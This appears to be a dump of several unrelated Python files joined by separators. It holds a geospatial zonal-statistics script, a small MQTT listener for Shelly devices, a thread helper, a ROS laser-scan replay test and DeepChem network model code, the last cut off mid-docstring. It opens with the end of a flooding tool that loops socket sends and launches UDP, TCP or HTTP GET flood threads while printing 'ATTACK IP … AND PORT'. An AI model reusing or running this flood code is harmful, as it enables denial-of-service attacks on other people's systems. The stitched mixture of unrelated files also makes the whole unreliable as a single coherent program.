s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
for x in range(time):
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.send(data)
s.send(data)
s.send(data)
s.send(data)
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
s.sendall(str.encode(request))
print("\033[1;36;40m ATTACK IP %s ANF PORT %s"%(ip,port))
except socket.error:
s.close()
print("\033[1;36;40m ATTACK IP %s AND PORT %s"%(ip,port))
for y in range(threads):
if choice == 'UDP':
th = threading.Thread(target = udp)
th.start()
elif choice == 'TCP':
th = threading.Thread(target = tcp)
th.start()
elif choice == 'GET':
th = threading.Thread(target = get)
th.start()
|
zonal_stats_parallel.py
|
from rasterstats import zonal_stats
import time
import fiona
import multiprocessing as mp
from shapely.geometry import mapping, shape
#input zones
zone_f = "zones.shp"
#output zonal stats
zonal_f = "zonal_stats.shp"
#Raster you want to use to compute zonal statistics from, here the 10m DEM of the whole of Finland
vrt = "/appl/data/geo/mml/dem10m/dem10m_direct.vrt"
statistics = ['count', 'min' ,'mean', 'max','median']
#yields n-sized chunks from list l (used for splitting the task across multiple processes)
def chunks(l, n):
for i in range(0, len(l), n):
yield l[i:i + n]
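# e.g. (hypothetical input): list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]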
#calculates zonal stats and adds results to a dictionary
def worker(z,vrt,d):
z_stats = zonal_stats(z,vrt, stats=statistics)
for i in range(0,len(z_stats)):
d[z[i]['id']]=z_stats[i]
#write output polygon
def write_output(zones, zonal_f,d):
#copy schema and crs from input and add new fields for each statistic
schema = zones.schema.copy()
crs = zones.crs
for stat in statistics:
schema['properties'][stat] = 'float'
with fiona.open(zonal_f, 'w', 'ESRI Shapefile', schema, crs) as output:
for elem in zones:
for stat in statistics:
elem['properties'][stat]=d[elem['id']][stat]
output.write({'properties':elem['properties'],'geometry': mapping(shape(elem['geometry']))})
def main():
with fiona.open(zone_f) as zones:
jobs = []
#create manager dictionary (polygon ids=keys, stats=entries) where multiple processes can write without conflicts
man = mp.Manager()
d = man.dict()
#split zone polygons into 10 chunks for parallel processing and call worker() for each.
    # Adjust 10 to the number of cores you want to use for optimal performance.
split = chunks(zones, len(zones)//10)
for z in split:
p = mp.Process(target=worker,args=(z, vrt,d))
p.start()
jobs.append(p)
        #wait until all chunks are finished
[j.join() for j in jobs]
write_output(zones,zonal_f,d)
if __name__ == '__main__':
t0 = time.time()
main()
t1 = time.time()
total = t1-t0
print("Everything done, took: " + str(total)+"s")
|
mqtt.py
|
import socket
import threading
import json
from .const import (
LOGGER, SHELLY_TYPES
)
class MQTT_connection:
def __init__(self, mqtt, connection, client_address):
self._mqtt = mqtt
self._connection = connection
#connection.settimeout(5)
self._client_address = client_address
self._thread = threading.Thread(target=self._loop)
self._thread.name = "MQTT connection"
self._thread.daemon = True
self._thread.start()
def _loop(self):
try:
# Receive the data in small chunks and retransmit it
while not self._mqtt._root.stopped.isSet():
try:
head = self._connection.recv(1)
if not head:
break
pkg_type=head[0]>>4
flags=head[0]&0xF
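                    # MQTT encodes the remaining length as a variable-length
                    # integer: 7 data bits per byte, bit 7 set means another
                    # byte follows (e.g. 0xC1 0x02 decodes to 65 + 2*128 = 321)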
length = 0
for s in range(0,4):
ldata = self._connection.recv(1)[0]
length += (ldata & 0x7F) << (s * 7)
if not ldata & 128:
break
LOGGER.debug(f"type=%d, flags=%d, length=%d" %
(pkg_type, flags, length))
data = self._connection.recv(length) if length else None
                    if pkg_type==1:
                        # CONNECT packet: acknowledge the client with a CONNACK
                        msg = b'\x20\x04\x20\x00\x00\x00'
                        self._connection.send(msg)
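                    # PUBLISH packet: 2-byte big-endian topic length, topic, then payload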
if pkg_type==3:
topic_len = (data[0]<<8) + data[1]
topic = data[2:2+topic_len].decode('ASCII')
payload = data[2+topic_len:]
if topic=='shellies/announce':
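                            # the announce payload is JSON, e.g.
                            # {"id": "shelly1-ABC123", "ip": "192.168.1.10", ...}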
payload = json.loads(payload)
ip_addr = payload['ip']
shelly_id = payload['id']
shelly_type, device_id = shelly_id.rsplit('-',1)
device_type = self._mqtt._mqtt_types.get(shelly_type)
if device_type:
self._mqtt._root.update_block(device_id, \
device_type, ip_addr, 'MQTT-discovery', None)
else:
topics = topic.split('/')
shelly_id = topics[1]
shelly_type, device_id = shelly_id.rsplit('-',1)
device_type = self._mqtt._mqtt_types.get(shelly_type)
self._mqtt._root.update_block(device_id, \
device_type, None, 'MQTT-data', None, True)
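                    # PINGREQ keep-alive packet: answer with a PINGRESP (0xD0 0x00)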
if pkg_type==12:
msg = b'\xD0\x00'
self._connection.send(msg)
except socket.timeout:
pass
except Exception as ex:
LOGGER.exception("Error receiving MQTT message")
break
finally:
#Clean up
try:
self._connection.close()
except:
pass
try:
self._mqtt._connections.remove(self)
except:
pass
class MQTT():
def __init__(self, root):
self._root = root
self._thread = threading.Thread(target=self._loop)
self._thread.name = "MQTT"
self._thread.daemon = True
self._socket = None
self._connections = []
self._mqtt_types = {}
for key, item in SHELLY_TYPES.items():
if 'mqtt' in item:
self._mqtt_types[item['mqtt']]=key
def start(self):
self._init_socket()
self._thread.start()
def _init_socket(self):
# Create a TCP/IP socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((self._root.bind_ip, 9955))
sock.listen(1)
self._socket = sock
def _loop(self):
while not self._root.stopped.isSet():
try:
# Wait for a connection
connection, client_address = self._socket.accept()
conn = MQTT_connection(self, connection, client_address)
self._connections.append(conn)
except Exception as ex:
LOGGER.exception("Error connect MQTT")
def close(self):
self._socket.close()
|
threadable.py
|
#!/usr/bin/env python3
import time
import threading
class Threadable:
def __init__(self):
self.stopper = threading.Event()
def start(self):
threading.Thread(target=self.target).start()
def stop(self):
self.stopper.set()
    def loop(self):
time.sleep(1)
def target(self):
while not self.stopper.is_set():
self.loop()
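
# Minimal usage sketch (an assumed example, not part of the original class):
# subclass Threadable and override loop() with the work to repeat.
if __name__ == "__main__":
    class Ticker(Threadable):
        def loop(self):
            print("tick")
            time.sleep(1)

    ticker = Ticker()
    ticker.start()
    time.sleep(3)  # let it tick a few times
    ticker.stop()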
|
test_laser.py
|
#!/usr/bin/python
# Copyright (c) 2020 Carnegie Mellon University
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
"""Test laser"""
import os
import re
import sys
import threading
import unittest
import traceback
import rospy
import roslib
import rosbag
import sensor_msgs.msg
import tf2_msgs.msg
PKG = 'cabot'
roslib.load_manifest(PKG)
sys.path.append('../src')
## test
class TestLaser(unittest.TestCase):
"""Test class"""
def setUp(self):
pass
def load_bags(self, subdir):
dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "data", subdir)
bags = []
for f in [f for f in os.listdir(dir) if re.match(".*bag", f)]:
bags.append(self.load_bag(dir, f))
return bags
def load_bag(self, dir, name):
return rosbag.Bag(os.path.join(dir, name))
def test_scan(self):
bags = self.load_bags("set4")
for bag in bags:
rospy.loginfo("testing {}".format(bag))
count = 0
for topic, msg, t in bag.read_messages(topics=['/scan', '/tf', '/tf_static']):
if rospy.is_shutdown():
return
if topic == "/scan":
if count > 0:
                        count -= 1
continue
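                    # re-stamp the recorded scan and replay it, pacing
                    # messages by ~duration seconds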
msg.header.stamp = rospy.get_rostime()
pub.publish(msg)
rospy.sleep(duration)
if topic == "/tf":
global tf_buffer
process_tf(msg, tf_buffer)
if topic == "/tf_static":
global tfs_buffer
process_tf(msg, tfs_buffer)
pass
self.assertTrue(True)
tf_buffer = {}
tfs_buffer = {}
# single shared lock protecting both TF buffers across threads
tf_lock = threading.Lock()
def process_tf(msg, buffer):
    # hold the shared lock so the publisher thread sees a consistent buffer
    with tf_lock:
        for t in msg.transforms:
            key = "{}-{}".format(t.header.frame_id, t.child_frame_id)
            buffer[key] = t
def tf_publisher():
rate = rospy.Rate(20)
while not rospy.is_shutdown():
        with tf_lock:
            if len(tfs_buffer) > 0:
                msg_static = tf2_msgs.msg.TFMessage()
                for key in tfs_buffer:
                    tfs = tfs_buffer[key]
                    tfs.header.stamp = rospy.get_rostime()
                    msg_static.transforms.append(tfs)
                pubtfs.publish(msg_static)
                tfs_buffer.clear()
            msg = tf2_msgs.msg.TFMessage()
            for key in tf_buffer:
                tf = tf_buffer[key]
                tf.header.stamp = rospy.get_rostime()
                msg.transforms.append(tf)
            pubtf.publish(msg)
rate.sleep()
if __name__ == "__main__":
import rosunit
rospy.init_node("test_laser")
pub = rospy.Publisher("/scan", sensor_msgs.msg.LaserScan, queue_size=10, latch=True)
pubtf = rospy.Publisher("/tf", tf2_msgs.msg.TFMessage, queue_size=100, latch=True)
pubtfs = rospy.Publisher("/tf_static", tf2_msgs.msg.TFMessage, queue_size=100, latch=True)
thread = threading.Thread(target=tf_publisher)
thread.start()
duration = rospy.get_param("~duration", 3)
rosunit.unitrun(PKG, 'test_laser', TestLaser)
|
fcnet.py
|
"""TensorFlow implementation of fully connected networks.
"""
from __future__ import print_function
from __future__ import division
from __future__ import unicode_literals
import warnings
import time
import numpy as np
import tensorflow as tf
import threading
import collections
import deepchem as dc
from deepchem.nn import model_ops
from deepchem.utils.save import log
from deepchem.metrics import to_one_hot, from_one_hot
from deepchem.data import pad_features
from deepchem.models.tensorflow_models import TensorflowGraph
from deepchem.models.tensorflow_models import TensorflowGraphModel
from deepchem.models.tensorflow_models import TensorflowClassifier
from deepchem.models.tensorflow_models import TensorflowRegressor
from deepchem.models.tensorgraph.tensor_graph import TensorGraph, TFWrapper
from deepchem.models.tensorgraph.layers import Feature, Label, Weights, WeightedError, Dense, Dropout, WeightDecay, Reshape, SoftMaxCrossEntropy, L2Loss, ReduceSum
class MultiTaskClassifier(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
n_classes=2,
**kwargs):
"""Create a MultiTaskClassifier.
    In addition to the following arguments, this class also accepts all the keyword arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes). Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
    bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
      the dropout probability to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
n_classes: int
the number of classes
"""
super(MultiTaskClassifier, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
self.n_classes = n_classes
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * n_layers
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * n_layers
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, n_classes),
in_layers=[
Dense(in_layers=[prev_layer], out_channels=n_tasks * n_classes)
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, n_classes))
weights = Weights(shape=(None, n_tasks))
loss = SoftMaxCrossEntropy(in_layers=[labels, output])
weighted_loss = WeightedError(in_layers=[loss, weights])
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = to_one_hot(y_b.flatten(),
self.n_classes).reshape(
-1, self.n_tasks,
self.n_classes)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_proba(self, dataset, transformers=[], outputs=None):
return super(MultiTaskClassifier, self).predict(dataset, transformers,
outputs)
def predict(self, dataset, transformers=[], outputs=None):
"""
Uses self to make predictions on provided Dataset object.
Parameters
----------
dataset: dc.data.Dataset
Dataset to make prediction on
transformers: list
List of dc.trans.Transformers.
outputs: object
If outputs is None, then will assume outputs = self.outputs[0] (single
output). If outputs is a Layer/Tensor, then will evaluate and return as a
single ndarray. If outputs is a list of Layers/Tensors, will return a list
of ndarrays.
Returns
-------
y_pred: numpy ndarray or list of numpy ndarrays
"""
# Results is of shape (n_samples, n_tasks, n_classes)
retval = super(MultiTaskClassifier, self).predict(dataset, transformers,
outputs)
# retval is of shape (n_samples, n_tasks)
return np.argmax(retval, axis=2)
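# Usage sketch for MultiTaskClassifier (hypothetical data, shown as a comment
# so the module's behavior is unchanged):
#   X = np.random.rand(20, 10)
#   y = np.random.randint(2, size=(20, 1))
#   dataset = dc.data.NumpyDataset(X, y)
#   model = MultiTaskClassifier(n_tasks=1, n_features=10, layer_sizes=[100])
#   model.fit(dataset, nb_epoch=1)
#   preds = model.predict(dataset)  # (n_samples, n_tasks) class indices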
class MultiTaskRegressor(TensorGraph):
def __init__(self,
n_tasks,
n_features,
layer_sizes=[1000],
weight_init_stddevs=0.02,
bias_init_consts=1.0,
weight_decay_penalty=0.0,
weight_decay_penalty_type="l2",
dropouts=0.5,
activation_fns=tf.nn.relu,
**kwargs):
"""Create a MultiTaskRegressor.
    In addition to the following arguments, this class also accepts all the keyword arguments
from TensorGraph.
Parameters
----------
n_tasks: int
number of tasks
n_features: int
number of features
layer_sizes: list
the size of each dense layer in the network. The length of this list determines the number of layers.
weight_init_stddevs: list or float
the standard deviation of the distribution to use for weight initialization of each layer. The length
of this list should equal len(layer_sizes)+1. The final element corresponds to the output layer.
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
bias_init_consts: list or float
the value to initialize the biases in each layer to. The length of this list should equal len(layer_sizes)+1.
The final element corresponds to the output layer. Alternatively this may be a single value instead of a list,
in which case the same value is used for every layer.
weight_decay_penalty: float
the magnitude of the weight decay penalty to use
weight_decay_penalty_type: str
the type of penalty to use for weight decay, either 'l1' or 'l2'
dropouts: list or float
      the dropout probability to use for each layer. The length of this list should equal len(layer_sizes).
Alternatively this may be a single value instead of a list, in which case the same value is used for every layer.
activation_fns: list or object
the Tensorflow activation function to apply to each layer. The length of this list should equal
len(layer_sizes). Alternatively this may be a single value instead of a list, in which case the
same value is used for every layer.
"""
super(MultiTaskRegressor, self).__init__(**kwargs)
self.n_tasks = n_tasks
self.n_features = n_features
n_layers = len(layer_sizes)
if not isinstance(weight_init_stddevs, collections.Sequence):
weight_init_stddevs = [weight_init_stddevs] * (n_layers + 1)
if not isinstance(bias_init_consts, collections.Sequence):
bias_init_consts = [bias_init_consts] * (n_layers + 1)
if not isinstance(dropouts, collections.Sequence):
dropouts = [dropouts] * n_layers
if not isinstance(activation_fns, collections.Sequence):
activation_fns = [activation_fns] * n_layers
# Add the input features.
mol_features = Feature(shape=(None, n_features))
prev_layer = mol_features
# Add the dense layers
for size, weight_stddev, bias_const, dropout, activation_fn in zip(
layer_sizes, weight_init_stddevs, bias_init_consts, dropouts,
activation_fns):
layer = Dense(
in_layers=[prev_layer],
out_channels=size,
activation_fn=activation_fn,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer, stddev=weight_stddev),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_const))
if dropout > 0.0:
layer = Dropout(dropout, in_layers=[layer])
prev_layer = layer
# Compute the loss function for each label.
output = Reshape(
shape=(-1, n_tasks, 1),
in_layers=[
Dense(
in_layers=[prev_layer],
out_channels=n_tasks,
weights_initializer=TFWrapper(
tf.truncated_normal_initializer,
stddev=weight_init_stddevs[-1]),
biases_initializer=TFWrapper(
tf.constant_initializer, value=bias_init_consts[-1]))
])
self.add_output(output)
labels = Label(shape=(None, n_tasks, 1))
weights = Weights(shape=(None, n_tasks))
weighted_loss = ReduceSum(L2Loss(in_layers=[labels, output, weights]))
if weight_decay_penalty != 0.0:
weighted_loss = WeightDecay(
weight_decay_penalty,
weight_decay_penalty_type,
in_layers=[weighted_loss])
self.set_loss(weighted_loss)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
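# Usage sketch for MultiTaskRegressor (hypothetical data, comment-only):
#   X = np.random.rand(20, 10)
#   y = np.random.rand(20, 3)
#   dataset = dc.data.NumpyDataset(X, y)
#   model = MultiTaskRegressor(n_tasks=3, n_features=10, layer_sizes=[100])
#   model.fit(dataset, nb_epoch=1)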
class MultiTaskFitTransformRegressor(MultiTaskRegressor):
"""Implements a MultiTaskRegressor that performs on-the-fly transformation during fit/predict.
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
fit_transformers=[],
n_evals=1,
batch_size=50,
**kwargs):
"""Create a MultiTaskFitTransformRegressor.
    In addition to the following arguments, this class also accepts all the keyword arguments
from MultiTaskRegressor.
Parameters
----------
n_tasks: int
number of tasks
n_features: list or int
number of features
fit_transformers: list
List of dc.trans.FitTransformer objects
n_evals: int
      Number of evaluations per example at predict time
"""
self.fit_transformers = fit_transformers
self.n_evals = n_evals
# Run fit transformers on dummy dataset to determine n_features after transformation
if isinstance(n_features, list):
X_b = np.ones([batch_size] + n_features)
elif isinstance(n_features, int):
X_b = np.ones([batch_size, n_features])
else:
raise ValueError("n_features should be list or int")
for transformer in fit_transformers:
X_b = transformer.X_transform(X_b)
n_features = X_b.shape[1]
print("n_features after fit_transform: %d" % int(n_features))
super(MultiTaskFitTransformRegressor, self).__init__(
n_tasks, n_features, batch_size=batch_size, **kwargs)
def default_generator(self,
dataset,
epochs=1,
predict=False,
deterministic=True,
pad_batches=True):
for epoch in range(epochs):
for (X_b, y_b, w_b, ids_b) in dataset.iterbatches(
batch_size=self.batch_size,
deterministic=deterministic,
pad_batches=pad_batches):
feed_dict = dict()
if y_b is not None and not predict:
feed_dict[self.labels[0]] = y_b.reshape(-1, self.n_tasks, 1)
if X_b is not None:
if not predict:
for transformer in self.fit_transformers:
X_b = transformer.X_transform(X_b)
feed_dict[self.features[0]] = X_b
if w_b is not None and not predict:
feed_dict[self.task_weights[0]] = w_b
yield feed_dict
def predict_on_generator(self, generator, transformers=[], outputs=None):
def transform_generator():
for feed_dict in generator:
X = feed_dict[self.features[0]]
for i in range(self.n_evals):
X_t = X
for transformer in self.fit_transformers:
X_t = transformer.X_transform(X_t)
feed_dict[self.features[0]] = X_t
yield feed_dict
return super(MultiTaskFitTransformRegressor, self).predict_on_generator(
transform_generator(), transformers, outputs)
class TensorflowMultiTaskClassifier(TensorflowClassifier):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskClassifier is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
n_features = self.n_features
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = model_ops.multitask_logits(layer, self.n_tasks)
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = to_one_hot(y_b[:, task])
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(
to_one_hot(np.zeros((self.batch_size,))))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskRegressor(TensorflowRegressor):
"""Implements an icml model as configured in a model_config.proto."""
def build(self, graph, name_scopes, training):
"""Constructs the graph architecture as specified in its config.
This method creates the following Placeholders:
mol_features: Molecule descriptor (e.g. fingerprint) tensor with shape
batch_size x n_features.
"""
warnings.warn("TensorflowMultiTaskRegressor is deprecated. "
"Will be removed in DeepChem 1.4.", DeprecationWarning)
n_features = self.n_features
placeholder_scope = TensorflowGraph.get_placeholder_scope(
graph, name_scopes)
with graph.as_default():
with placeholder_scope:
mol_features = tf.placeholder(
tf.float32, shape=[None, n_features], name='mol_features')
layer_sizes = self.layer_sizes
weight_init_stddevs = self.weight_init_stddevs
bias_init_consts = self.bias_init_consts
dropouts = self.dropouts
lengths_set = {
len(layer_sizes),
len(weight_init_stddevs),
len(bias_init_consts),
len(dropouts),
}
assert len(lengths_set) == 1, 'All layer params must have same length.'
n_layers = lengths_set.pop()
assert n_layers > 0, 'Must have some layers defined.'
label_placeholders = self.add_label_placeholders(graph, name_scopes)
weight_placeholders = self.add_example_weight_placeholders(
graph, name_scopes)
if training:
graph.queue = tf.FIFOQueue(
capacity=5,
dtypes=[tf.float32] *
(len(label_placeholders) + len(weight_placeholders) + 1))
graph.enqueue = graph.queue.enqueue([mol_features] + label_placeholders
+ weight_placeholders)
queue_outputs = graph.queue.dequeue()
labels = queue_outputs[1:len(label_placeholders) + 1]
weights = queue_outputs[len(label_placeholders) + 1:]
prev_layer = queue_outputs[0]
else:
labels = label_placeholders
weights = weight_placeholders
prev_layer = mol_features
prev_layer_size = n_features
for i in range(n_layers):
layer = tf.nn.relu(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, layer_sizes[i]],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(
value=bias_init_consts[i], shape=[layer_sizes[i]])))
layer = model_ops.dropout(layer, dropouts[i], training)
prev_layer = layer
prev_layer_size = layer_sizes[i]
output = []
for task in range(self.n_tasks):
output.append(
tf.squeeze(
model_ops.fully_connected_layer(
tensor=prev_layer,
size=layer_sizes[i],
weight_init=tf.truncated_normal(
shape=[prev_layer_size, 1],
stddev=weight_init_stddevs[i]),
bias_init=tf.constant(value=bias_init_consts[i],
shape=[1]))))
return (output, labels, weights)
def construct_feed_dict(self, X_b, y_b=None, w_b=None, ids_b=None):
"""Construct a feed dictionary from minibatch data.
TODO(rbharath): ids_b is not used here. Can we remove it?
Args:
X_b: np.ndarray of shape (batch_size, n_features)
y_b: np.ndarray of shape (batch_size, n_tasks)
w_b: np.ndarray of shape (batch_size, n_tasks)
ids_b: List of length (batch_size) with datapoint identifiers.
"""
orig_dict = {}
orig_dict["mol_features"] = X_b
for task in range(self.n_tasks):
if y_b is not None:
orig_dict["labels_%d" % task] = y_b[:, task]
else:
# Dummy placeholders
orig_dict["labels_%d" % task] = np.squeeze(np.zeros((self.batch_size,)))
if w_b is not None:
orig_dict["weights_%d" % task] = w_b[:, task]
else:
# Dummy placeholders
orig_dict["weights_%d" % task] = np.ones((self.batch_size,))
return TensorflowGraph.get_feed_dict(orig_dict)
class TensorflowMultiTaskFitTransformRegressor(TensorflowMultiTaskRegressor):
"""Implements a TensorflowMultiTaskRegressor that performs on-the-fly transformation during fit/predict
Example:
>>> n_samples = 10
>>> n_features = 3
>>> n_tasks = 1
>>> ids = np.arange(n_samples)
>>> X = np.random.rand(n_samples, n_features, n_features)
>>> y = np.zeros((n_samples, n_tasks))
>>> w = np.ones((n_samples, n_tasks))
>>> dataset = dc.data.NumpyDataset(X, y, w, ids)
>>> fit_transformers = [dc.trans.CoulombFitTransformer(dataset)]
>>> model = dc.models.TensorflowMultiTaskFitTransformRegressor(n_tasks, [n_features, n_features],
... dropouts=[0.], learning_rate=0.003, weight_init_stddevs=[np.sqrt(6)/np.sqrt(1000)],
... batch_size=n_samples, fit_transformers=fit_transformers, n_evals=1)
n_features after fit_transform: 12
"""
def __init__(self,
n_tasks,
n_features,
logdir=None,
layer_sizes=[1000],
weight_init_stddevs=[.02],
bias_init_consts=[1.],
penalty=0.0,
penalty_type="l2",
dropouts=[0.5],
learning_rate=0.002,
momentum=.8,
optimizer="adam",
batch_size=50,
fit_transformers=[],
n_evals=1,
verbose=True,
seed=None,
**kwargs):
"""Initialize TensorflowMultiTaskFitTransformRegressor
Parameters
----------
n_tasks: int
Number of tasks
n_features: list or int
Number of features.
logdir: str
Location to save data
layer_sizes: list
List of layer sizes.
